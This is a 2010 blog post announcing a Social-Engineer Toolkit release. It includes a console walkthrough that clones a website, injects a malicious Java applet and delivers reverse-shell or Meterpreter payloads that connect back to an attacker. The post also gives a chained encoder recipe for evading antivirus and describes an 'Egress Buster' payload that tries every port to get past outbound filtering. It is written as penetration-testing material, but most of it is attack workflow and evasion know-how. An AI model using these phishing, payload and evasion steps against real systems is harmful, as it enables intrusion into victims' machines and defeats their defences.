Skip to Main Content
February 24, 2010

SET V0.4.1 Rise of the Pink Pirate

Written by David Kennedy
Security Testing & Analysis Social Engineering
Well since the ShmooCon talk there has been a wide variety of testing and feedback coming from the latest version. I have to say that I am appreciative of everyone trying to contribute to the project its been great. So many thanks to all of you that have contacted me! OK so now the thanks are out of the way, what's different in SET V0.4.1 "Rise of the Pink Pirate". One of the biggest complaints on SET v0.4 was the anti-virus detection, well the default option now allows you to utilize multi-encoder options through msfencode to piggy back multiple methods. I spent about 8 hours going through every combination of A/V detection and finding which combination worked the best. It's not a 100 percent science and it changes since shikata is a polymorphic-based shellcode. The combination I ended up coming up with was: Shikata encoding 5 times Alpha_Upper encoding 2 times Shikata encoding 5 times Countdown encoding 5 times This combination gets around roughly 85 percent of the virus vendors out there. This will probably need to continuously changed. I am also looking at writing a dynamic encoder custom to SET that would create a decoder stub in memory and would be somewhat polymorphic and add on-top of the encoders in MSF. Hopefully have this in 0.5 which is expected to release in the April timeframe. To access this new feature, do the following: root@bt:/pentest/exploits/set# ./set Welcome to the Social-Engineer Toolkit (SET). Your one stop shop for all of your social-engineering needs.. Select from the menu on what you would like to do: 1. Spear-Phishing (Email) Attacks 2. Website Attack Vectors 3. Update the Metasploit Framework 4. Update the Social-Engineer Toolkit 5. Create a Payload and Listener 6. Help, Credits, and About 7. Exit the Social-Engineer Toolkit Enter your choice: 2 The Social-Engineer Toolkit "Web Attack" will create a fake "professional" looking website for you with malicious java applet code or utilize iframes with Metasploit payloads. When you entice a victim to the website either through social-engineering, a XSS vulnerability, arp cache poisioning, E-Mail, or other options. The payload can either be something you specify or dynamically through the Metasploit framework. A new addition is the ability to clone a website. SET will allow you to clone a website you specify and automatically inject the java applet attack or browser exploit into the site. This can be useful if you want to make a website look similar to a company that you are doing a penetration testing on and want the site to look and feel like their own. It's currently experimental. Please email any issues to [email protected] Website Attack Vectors 1. Let SET create a website for you 2. Clone and setup a fake website 3. Import your own website 4. Return to main menu. Enter number (1-4): 2 Enter what type of attack you would like to utilize. The Java Applet attack will spoof a Java Certificate and delivery a metasploit based payload. The Metasploit browser exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload. 1. The Java Applet Attack Method 2. The Metasploit Browser Exploit Method 3. Return to the previous menu. Enter your choice (press enter for default): 1 SET supports both HTTP and HTTPS Example: Enter the url to clone: [fusion_builder_container hundred_percent="yes" overflow="visible"][fusion_builder_row][fusion_builder_column type="1_1" background_position="left top" background_color="" border_size="" border_color="" border_style="solid" spacing="yes" background_image="" background_repeat="no-repeat" padding="" margin_top="0px" margin_bottom="0px" class="" id="" animation_type="" animation_speed="0.3" animation_direction="left" hide_on_mobile="no" center_content="no" min_height="none"][*] Cloning the website: [*] This could take a little bit... [*] Injecting Java Applet attack into the newly cloned website. [*] Malicious java applet website prepped for deployment What payload do you want to generate: Name: Description: 1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker. 2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker. 3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker. 4. Windows Bind Shell Execute payload and create an accepting port on remote system. 5. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline 6. Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline 7. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter 8. Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports 9. Import your own executable Specify a path for your own executable Enter choice (hit enter for default): Below is a list of encodings to try and bypass AV. Select one of the below, Shikata_Ga_Nai is typically the best. 1. avoid_utf8_tolower (Good) 2. shikata_ga_nai (Excellent) 3. alpha_mixed (Good) 4. alpha_upper (Good) 5. call4_dword_xor (Good) 6. countdown (Good) 7. fnstenv_mov (Good) 8. jmp_call_additive (Good) 9. nonalpha (Good) 10. nonupper (Good) 11. unicode_mixed (Good) 12. unicode_upper (Good) 13. alpha2 (Good) 14. No Encoding (None) 15. Multi-Encoder (BEST) Enter your choice (enter for default): [-] Enter the PORT of the listener (enter for default): 443 [-] Encoding the payload multiple times to get around pesky Anti-Virus. [-] [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 345 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 372 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 399 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 426 (iteration=5) [*] x86/alpha_upper succeeded with size 921 (iteration=1) [*] x86/alpha_upper succeeded with size 1911 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 1940 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 1969 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 1998 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 2027 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 2056 (iteration=5) [*] x86/countdown succeeded with size 2074 (iteration=1) [*] x86/countdown succeeded with size 2092 (iteration=2) [*] x86/countdown succeeded with size 2110 (iteration=3) [*] x86/countdown succeeded with size 2128 (iteration=4) [*] x86/countdown succeeded with size 2146 (iteration=5) This is just a compliment to an already awesome attack you can utilize within the Social-Engineer Toolkit and adding the overall power of Metasploit. Onto the next big option, there is now the ability to utilize the Meterpreter ALL PORTS payload within SET. If your not familiar with this payload type what it will do is execute a meterpreter payload on the affected system and try (slowly) every single port to connect out of until it finds a way home to the attackers machine. This is all now built into SET where it will auto create the payload, deliver the custom Java applet and execute the payload on the victim. Now all ports will be attempted to essentially kill most egress filtering, typically you can find a port outbound. It is now labeled in the Web Attack as "Windows Meterpreter Egress Buster". With this release, it also adds better obfuscation techniques when deploying the metasploit payloads so that specific signatures can't be written by the payload delivery system since its a unique alpha string each time the payload is delivered.[/fusion_builder_column][/fusion_builder_row][/fusion_builder_container]